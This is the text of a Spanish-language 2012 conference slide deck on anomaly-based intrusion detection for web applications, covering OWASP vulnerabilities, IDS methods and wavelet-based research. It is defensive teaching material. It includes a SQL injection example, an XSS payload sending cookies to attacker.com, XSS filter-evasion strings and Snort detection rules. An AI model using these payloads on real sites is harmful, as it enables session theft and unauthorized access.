DETECCIÓN DE INTRUSIÓN POR ANOMALÍA

EN APLICACIONES WEB
Cristian Cappo (ccappo@pol.una.py)
Facultad Politécnica - UNA

Laboratorio de Computación Científica y Aplicada

 En esta presentación
1. Aplicaciones web. Características y funcionamiento.
2. Vulnerabilidades en las aplicaciones web y ataques
3. Detección de intrusión. Generalidades
4. Técnicas de detección de ataques web
5. Detección de ataques web por anomalía
6. Nuestro trabajo en el área
7. Conclusiones

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 3

 1. Aplicaciones web.
Características y funcionamiento

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 4

 ¿Qué es una aplicación web?
 Es aquella aplicación que utilizan la infraestructura
web para su funcionamiento, en particular
consideramos la que utiliza el protocolo HTTP
(HyperText Transfer Protocol - RFC 2616) para la
comunicación con sus usuarios.
 La web se ha convertido en el medio natural para
desplegar servicios de software.
Existen actualmente cerca de 665 millones de sitios web según
Netcraft (www.netcraft.com). (a julio/2012)

¿Cuántos de estos sitios poseen al menos una aplicación web?

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 5

 Beneficios de las aplicaciones web
 Utiliza un protocolo liviano(HTTP) y sin conexión
 El front-end es algo común en cualquier computadora
o dispositivo móvil: un navegador.
 Actualmente, los navegadores poseen mucha
funcionalidad.
 La tecnología y los lenguajes de desarrollo de las
aplicaciones son relativamente simples y fáciles de
conseguir.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 6

 Algunas funcionalidades de las aplicaciones web

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 7

 Funcionalidades de la aplicaciones web(2)
 Además de Internet, las organizaciones están
adoptando este esquema para soporte de sus
actividades de negocio:
 Aplicaciones para manejo administrativo: ejemplo
software ERP.
 Administración de infraestructura como servidores,
estaciones de trabajo, máquinas virtuales, mail & web
servers, etc.
 Software colaborativo: workflow, documentos, etc.
 Aplicaciones usuales de oficina (planilla, proc. de texto,
etc): Google apps, MS Office live, etc.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 8

 Arquitectura web : Esquema básico

Firewall

App - Web Servidor

de Base
Cliente Servidor
de datos
Web Web App - Web

Tráfico HTTP Puerto 80

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 9

 Arquitectura web : Funcionamiento
 Todas las transacciones HTTP siguen el mismo formato.
Cada request(cliente) y cada response(servidor) tiene
tres partes: la línea del request (que indica el método
HTTP) o response, la cabecera y el cuerpo

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 10

 Arquitectura web: Componentes
 Métodos HTTP: los principales GET y POST. Otros: HEAD, TRACE,
OPTIONS, DELETE.
 URL (uniform resource locator): identificador único para un recurso web.
El formato es el siguiente:
protocol: //hostname[:port]/[path/]file?[param=value]
 Envío de parámetros: en el URL query string, en los cookies, en el cuerpo
usando POST.
 Las aplicaciones pueden ser construidas con una variedad de
tecnologías:
 Lenguajes de scripts como: PHP, VBScript, Perl, etc
 Plataformas de aplicaciones web : APS.NET, Java, Ruby on rails,
 Web servers: Apache, IIS, Oracle, NCSA, IBM, etc
 Base de datos: Oracle, PostgreSQL, MySQL, etc
 Otros componentes de back-end: sistema de archivos, servicios web, servicios de
directorio, etc.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 11

 Arquitectura web: funcionalidad del lado cliente
 HTML4 y HTML5
 HyperLinks
 Forms
 CSS
 JavaScript
 VBScript
 DOM
 Ajax
 JSON
 Extensiones al browser: Java applets, controles ActiveX,
objetos Flash, objetos Silverlight, etc.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 12

 Arquitectura web: otras cuestiones
 Estado y Sesiones
 Esquemas de codificación (ejemplo del carácter = )
 URL %3d
 Unicode %u003d ó \u003d
 HTML = ó = ó &eq;
 Base64 PQ==
 Hex 3D
 Acceso remoto de clientes y serialización
 Adobe Flex y AMF (Action Message Format)
 MS Silverligth and WCF (Windows Communication Foundation)
 Objetos java serializados

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 13

 2. Vulnerabilidades en las aplicaciones
web y ataques

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 14

 ¿Qué es una vulnerabilidad?
 Es una debilidad o hueco de seguridad en la
aplicación que puede ser aprovechada o explotada
de forma malintencionada por un atacante y violar así
la seguridad del sistema, ó afectar su disponibilidad.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 15

 ¿Porqué las aplicaciones quedan vulnerables?
 Falta de aplicación de una metodología que incluya a
la seguridad como parte del proceso de desarrollo de
software.
 Software Development Lifecycle – SDL (Microsoft)
 SSE-CMM(ISO/IEC 21827) (SystemSecurityEngineering-CMM)
 SAMM (Software Assurance
Maturity Model (OWASP)
 Software Security
Framework (Citigal & Fortify )

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 16

 ¿Porqué las aplicaciones quedan vulnerables? (2)
 Conciencia sobre seguridad poco desarrollada.
 Desarrollo con ajustadas restricciones de tiempo y
recursos.
 Rápida evolución de las amenazas.
 Creciente demanda de nuevas funcionalidades.
 Ajuste de las aplicaciones en funcionamiento (o en
etapas finales de desarrollo) a las nuevas tecnologías.
 Desarrollo personalizado.
 La simplicidad engañosa de las herramientas.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 17

 Ejemplo de vulnerabilidades de una aplicación
utilizada usualmente
 Aplicación: Joomla! (www.joomla.org)
 Fuente: www.secunia.com (Secunia)
 Número de vulnerabilidades para Joomla! (2005-2012): 525
 2012: 27
 2011: 82
 2010: 236 Common Vulnerabilities
 2009: 66 and Exposures (CVE)
 Fuente : cve.mitre.org Desde 1999 a 2012, más
 Número de vulnerabilidades para Joomla! (2005-2012): 687 del 50% corresponde a
 2012: 7 vulnerabilidades web
 2011: 21
 2010: 236
 2009: 67
 Otras fuentes de consulta de vulnerabilidades:
 www.securityfocos.com (Symantec)
 osvdb.org (Open Source Vulnerability Database)
 www.securitytracker.com ( SecurityGlobal.net)
 www.webappsec.org (Web Hacking Incident Database) (exclusivo de aplicaciones web)
 xssed.com (Vulnerabilidades XSS) (lista un poco más de 45500 vulnerabilidades XSS)

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 18

 ¿Cómo evitar las vulnerabilidades?
 Hacer lo correcto desde el principio
 Pero
 No es posible 100% de seguridad
 Muchas veces utilizamos software de terceros , del que tal
vez desconozcamos su calidad.
 Tenemos que convivir con sistemas en funcionamiento
 Si es posible mejorar el software, debe hacerse!
 Es probable que tengamos que aumentar la seguridad
desde el exterior

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 19

 Razones para atacar una aplicación web
 Ubicuidad
 Existencia de técnicas simples de “hackeo”
 Anonimato
 Pasar por alto las protecciones “tradicionales”
(firewalls)
 Facilidad de código propio
 Seguridad inmadura
 Constantes cambios a las aplicaciones
 Dinero

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 20

 ¿Qué componentes son atacables?
 Plataforma web
 Aplicación web
 Base de datos
 Cliente web
 Comunicación
 Disponibilidad (DoS)

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 21

 Procesos del ataque
 Descubrir (profiling)
 Examinar el entorno
 Tipo y versión del SO, web server, web app server, etc
 Examinar la aplicación
 Examinar la estructura, tipo de lenguaje, tipo de objetos
 Generar y examinar errores
 Encontrar información oculta
 Definición del “target”
 Mecanismo de login
 Campos de entrada
 Manejo de sesiones
 Infraestructura
 ..

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 22

 Ataques web
Firewall

App - Web Servidor

Cliente Servidor de Base
Web Web App - Web de datos

GET /login.pl?user=http://hak.com/..
Tráfico HTTP
El firewall no puede
contrarrestar ataques que vienen
Puerto 80 en el contenido de los paquetes
HTTP (que es puerto abierto)

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 23

 Principales ataques web
 Open Web Application Security Project
 Organización sin fines de lucro que se dedica a ayudar a
entender y mejorar la seguridad de las aplicaciones y
servicios web.
 Entre uno de sus proyectos se encuentra la producción de
la lista de las diez vulnerabilidades más importantes de
las aplicaciones web. El último reporte es del 2010.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 24

 OWASP top 10 (2010)
1. Inyección (notablemente SQL Injection).
2. Secuencia de Comandos en Sitios Cruzados (XSS).
3. Pérdida de autenticación y gestión de sesiones.
4. Referencia Directa Insegura a objetos.
5. Falsificación de Petición de Sitios Cruzados (CSRF).
6. Defectuosa Configuración de Seguridad.
7. Almacenamiento criptográfico inseguro.
8. Falla de Restricción de Acceso a URL.
9. Protección insuficiente en la capa de transporte.
10. Redirecciones y reenvíos no validados.
===
OWASP 2007
- Ejecución de ficheros malintencionados
- Revelación de información y gestión incorrecta de errores.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 25

 Ejemplo de ataques más comunes
 SQL Injection
 Permite a los atacantes retransmitir código a través de la
aplicación web a otro sistema vía SQL.
 Las consecuencias: obtención de información privada,
saltar el esquema de autenticación, corromper datos,
ejecución de comandos del sistema operativo, etc

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 26

 SQL Injection - ejemplo
 Considerar el siguiente código perl No validado
…
$query = new CGI;
$username = $query->param(“username”);
$password = $query->param(“password”);
…
$sql_command = “select * from users where
username=‘$username’ and password=‘$password’”;
$sth = $dbh->prepare($sql_command)
…

 Un atacante podría aprovechar esta vulnerabilidad agregando

por ejemplo ‘ or 1=1 en el campo password de forma que
la consulta quedaría:
select * from users where username=‘juan’ and
password=‘’ or 1=1
HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 27
 Ejemplo de ataques comunes
 Secuencia de Comandos en Sitios Cruzados (XSS)
 La aplicación puede ser utilizada como mecanismo para
transportar un ataque al usuario final con un navegador.
 El navegador del usuario no tiene forma de conocer que el
script es malicioso
 Puede acceder a cookies, tokens de sesión o cualquier otra
información sensible guardada en el navegador.
 Pueden ser de tipo reflejados o permanentes.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 28

 XSS - Ejemplo
 Considerar el siguiente código Java
(String) page += "<input name='creditcard' type='TEXT‘
value='" + request.getParameter("CC") + "'>";

 El atacante puede modificar el parámetro CC en el

navegador
'><script>document.location='http://www.attacker.com/cgi-
bin/cookie.cgi? foo='+document.cookie</script>'.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 29

 ¿Qué hacer contra los ataques?
 Monitorizar
 Conocer que esta ocurriendo (buenas herramientas de S.O.)
 Detectar
 Conocer cuando existe un ataque (Intrusión Detection System)
 Prevenir
 Detener el ataque antes que logre su objetivo (Intrusión
Prevention System)
 Evaluar
 Descubrir los problemas antes que los atacantes:
 Test de penetración
 Análisis estático

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 30

 3. Detección de intrusión.
Generalidades

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 31

 IDS – Motivaciones
 El número de incidentes de seguridad crece, los
administradores de redes y sistemas aplican de forma
lenta las medidas correctivas.
 Los mecanismos de seguridad pueden deshabilitarse
como consecuencia de una mala configuración.
 Los usuarios de un sistema pueden abusar de sus
privilegios.
 Aún cuando un ataque no tuvo éxito es importante
enterarse del intento.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 32

 ¿Qué es un IDS?
 Es un software que detecta accesos sin autorización a
una red de datos o a un sistema computacional.
 Capaz de detectar el tráfico malicioso en una red o el
uso anormal de las computadoras.
 Es una entidad dinámica de monitoreo que
complementa las habilidades de un firewall.
 En el caso de un IDS para aplicaciones web,
usualmente recibe el nombre de WAF (Web
Application Firewall).

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 33

 Arquitectura de un IDS

Ambiente monitoreado
Arquitectura general según CIDF (Common ID Framework) (DARPA/IETF)
HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 34
 Posicionamiento habitual de un IDS - web
Firewall

Servidor
App - Web
Servidor de Base
Web de datos
App - Web

IDS

Cliente
Web App - Web Servidor
Servidor de Base
Web App - Web de datos

Tráfico HTTP Puerto 80

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 35

 Clasificación habitual de los IDS
 Según el dato monitoreado
 NIDS (Network IDS)
 HIDS (Host IDS)
 Según el abordaje de los algoritmos o método de detección
 Por plantillas o reglas (signature-based)
 Por anomalía (anomaly-based)
 Híbridos
 Comportamiento en la detección
 IDS
 IPS
 Frecuencia de uso
 Online
 Offline

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 36

 Métodos de detección
 Signature-based
 Basado en un conjunto de plantillas o reglas (signature)
 Ventajas
 Detección con bajo ratio de
falsos positivos
 Identificación precisa del tipo
de intrusión
 Protección inmediata
 Bajo consumo de recursos
 Desventajas
 Actualización constante del conjunto de signatures
 No puede lidiar con ataques desconocidos o polimórficos
 La descripción del ataque requiere mucha precisión, por tanto un
considerable trabajo especializado.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 37

 Métodos de detección
 Anomaly-Based
 Basado en que las actividades anómalas son maliciosas. Construyen
un modelo del comportamiento normal, usualmente denominado
perfil. Se compara el perfil con la información auditada para
establecer si existe o no un ataque o intrusión.
 Ventajas
 Detección de ataques desconocidos
 Es dificil para el atacante conocer
a priori la actividad que genera
una alarma.
 Desventajas
 Generación de muchos falsos positivos
 Tiempo requerido para el entrenamiento
 El ambiente monitoreado es dinámico
 En el periodo de entrenamiento es posible incluir ataques

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 38

 Detección por anomalía
 Existen varias técnicas utilizadas en la detección por anomalía (*)
 Técnicas estadísticas (comportamiento estocástico, las más usuales)
 Univariado
 Multivariado ( correlación entre variables)
 Series de tiempo
 Basadas en el conocimiento (sistemas expertos)
 Máquinas de estados finitos
 Lenguajes descriptivos ( ngram, XML, etc)
 Clasificación por reglas
 Redes Bayesianas
 Máquinas de aprendizaje (categorización de patrones)
 Cadenas de Markov
 Redes neuronales
 Lógica difusa
 Algoritmos genéticos
 Técnicas de clustering

* Anomaly-based network intrusion detection techniques, system and challenges

(P. García-Teodoro, J. Diaz, G. Macia & E. Vázques) . Computers & Security. Vol 28. 2009.
HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 39
 4. Técnicas de detección de
ataques web

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 40

 Detección de ataques web
 ¿Qué datos necesitamos?
 Máquina origen
 Timestamp
 Método HTTP
 URL solicitado
 Paquete HTTP completo (headers & body)
 Un ataque puede encontrarse en
 URL
 Cabecera HTTP del cliente
 Cookie
 En el body

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 41

 Detección de ataques web
 Por signature
 Es el método habitual y el más sencillo
 Algunos detectores en el mundo OpenSource
 Snort (www.snort.org)
 Mod_security (p/ apache www.modsecurity.org)
 PHPIDS (phpids.org)
 Suricata IDS (www.openinfosecfoundation.org)
 ESAPI WAF (www.owasp.org)
 En el mundo comercial existen muchos.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 42

Detección de ataques web por signature
Ejemplo de una regla de SNORT para XSS

Para un típico <script>alert(document.cookie)</script>

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC cross site scripting attempt"; flow:to_server,established;
content:"<SCRIPT>"; nocase; classtype:web-application-attack; sid:1497;
rev:6;)

Para un típico ataque <img src=javascript>

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"WEB-MISC cross site scripting HTML Image tag set to javascript attempt";
flow:to_server,established; content:"img src=javascript"; nocase;
classtype:web-application-attack; sid:1667; rev:5;)
Detección de ataques web por signature
Lo anterior puede ser evadido
– <a href="javas&#99;ript&#35;[code]">
– <div onmouseover="[code]">
– <img src="javas cript:[code]">
– <xml src="javascript:[code]">
– <img src=base64(amF2YXNjcmlwdA==)>
Detección de ataques web por signature
Podemos mejorar usando una expresión regular
/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)

Chequea la ocurrencia de :
 =
 seguido de uno o mas \n
 seguido de < o su equivalente hex.
 cero o mas /
 seguido de > o su equivalente hex.
Detección de ataques web por signature
Inconvenientes (1)
Los desarrolladores asumen que los campos ocultos no
cambian. Por tanto no puede detectar si hubo o no
manipulación en estos campos.

Por ejemplo, no puede escribirse una regla, cuando se cambia de un

valor 200 a 2 (suponiendo que el campo sea precio).
Detección de ataques web por signature
Inconvenientes (2)
Ataques de fuerza bruta (password, identificadores, usuarios,
etc).
Ejemplo:

http://www.nii.co.in/getorder.php?order_id=200406271
http://www.nii.co.in/getorder.php?order_id=200406272
http://www.nii.co.in/getorder.php?order_id=200406273
http://www.nii.co.in/getorder.php?order_id=200406274
Detección de ataques web por signature
 Inconvenientes (3)
 No es posible indicar una regla que pueda detectar
vulnerabilidades relacionados a la lógica de la aplicación.
 Considere el siguiente ejemplo:
<scri<s<script>crip>>alert(document.cookie)
</scri</script>ip>
¿Qué debería hacer el detector?
 5. Detección de ataques web por
anomalía

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 49

Detección de ataques web por anomalía
 Suelen complementar los detectores por signature
 Una sola técnica no puede abarcar todos los posibles
ataques. Normalmente se utilizan varias técnicas.
 Alguna técnicas utilizadas estan basadas en:
 Modelos estadísticos
 Técnicas de Machine Learning y Data Mining
 Computación inmunológica
 Procesamiento de señales
 Métodos basados en especificación
 Análisis de estados
 Detección de ataques web por anomalía
 El análisis puede ser hecho por campos individuales, por
todo el query string, por las cabeceras o por todo el
paquete HTTP.
 Algunos atributos que pueden ser analizados:
 Longitud de la entrada
 Distribución de caracteres
 Estructura de los parámetros
 Ausencia o presencia de caracteres
 Orden de los parámetros
 Frecuencia de las peticiones
 Correspondencia entre request/response
 Etc.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 51

 Anomaly detection of web based attack
(Kruegel & Vigna) 2003 (UCSB)
Modelo de datos

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 52

 Anomaly detection of web based attack
(Kruegel & Vigna) 2003 (UCSB)
Modelo de detección
 Utiliza seis modelos de detección que identifica una entrada
anómala en un conjunto asociado a un programa particular.
Cada modelo genera un valor de probabilidad que indica si la
entrada guarda relación con el perfil normal. Para determinar
el valor final (score) se usa la siguiente fórmula:

AnamalySco re  w
mModels
m * (1  pm )

 Cada modelo opera en dos fases: entrenamiento y detección.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 53

 Anomaly detection of web based attack
(Kruegel & Vigna) 2003 (UCSB)
 Modelos
 Longitud
 Distribución de caracteres
 Inferencia estructural
 Enumerador
 Presencia o ausencia de atributos
 Orden de los atributos
 En principio fue testado solamente con método GET.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 54

 Anomaly detection of web based attack
(Kruegel & Vigna) 2003 (UCSB)
 Capacidad de detección

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 55

 Using Generalization and Characterization Techniques in the Anomaly-
based Detection of Web Attacks (Robertson, Kruegel & Vigna) 2006

 Basado en el trabajo anterior de Kruegel & Vigna

 Incluye capacidad de caracterización de ataques y
establecimiento de signatures de anomalía

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 56

 Otros trabajos en detección de ataques web por
anomalía
 Tokdoc: a self-healing web application firewall (2010)
 Intrusion detection using gsad model for http trac on web services (2010)
 Spectrogram: A Mixture-of-Markov-Chains Model for Anomaly Detection in
Web Traffic (2009)
 Evaluation of anomaly based character distribution models in the detection
of sql injection attacks (2008)
 Boosting Web Intrusion Detection Systems by Inferring Positive Signatures
(2008)
 Swaddler: An Approach for the Anomaly-based Detection of State
Violations in Web Applications (2007)
 The Essence of Command Injection Attacks in Web Applications (2006).
 A multi-model approach to the detection of web-based attacks (2005).

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 57

 7. Nuestro trabajo en el área

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 58

 Nuestro trabajo en el área
 En el marco del doctorado en Ciencias de la
Computación.
 Tema: “Detección de Intrusión por anomalía en
aplicaciones web vía Transformada de Wavelet”
 Desarrollado en el LCCA ( Laboratorio de
Computación Científica y Aplicada).
(www.cc.pol.una.py/lcca)
 Areas de investigación: Bioinformática, Optimización,
Biomateriales, Mecánica computacional, Procesamiento de
imágenes, Ingeniería de Software, Computación Científica.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 59

 Idea
 Creación de algoritmos basados en el uso de la
transformada wavelet para detección de anomalías.
 Transformada wavelet:
 Es una herramienta matemática utilizada para descomponer
una señal en diferentes niveles de resolución a fin de realzar
características resaltantes de la misma.
 Su uso es variado:
 Compresión de datos, procesamiento digital de imágenes,
resolución de ecuaciones diferenciales, procesamiento de
señales, detección de intrusión, etc.
 En este trabajo consideramos el uso de la transformada
wavelet bidimensional.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 60

 Transformada wavelet 2D

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 61

 Detección de anomalía con TW2D
Modelo de Datos
En principio utilizamos el basado en la distribución de
caracteres.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 62

 Detección de anomalía con TW2D

Sin ataque

Con dos ataques:

path traversal & XSS

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 63

 Detección de anomalía con TW2D

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 64

 7. Conclusiones
 El número de ataques web esta creciendo
 Existe una necesidad de aplicar métodos de desarrollo
que incluya la seguridad como una cuestión natural.
 Los IDS son una herramienta válida para lidiar con los
ataques, aunque no es una solución 100% efectiva.
 La detección por anomalía es una buena estrategia,
aunque aún se encuentra en desarrollo. Es un complemento
a otras técnicas de defensa ampliamente utilizadas.
 El avance tecnológico facilita el desarrollo y la
funcionalidad de las aplicaciones web pero se vienen
nuevas amenazas a tener en cuenta. Ejemplo: HTML5.

HUBCONF 2012 - Detección de Intrusión por anomalía en aplicaciones web 65

¡Muchas gracias por su atención!
¿ PREGUNTAS ?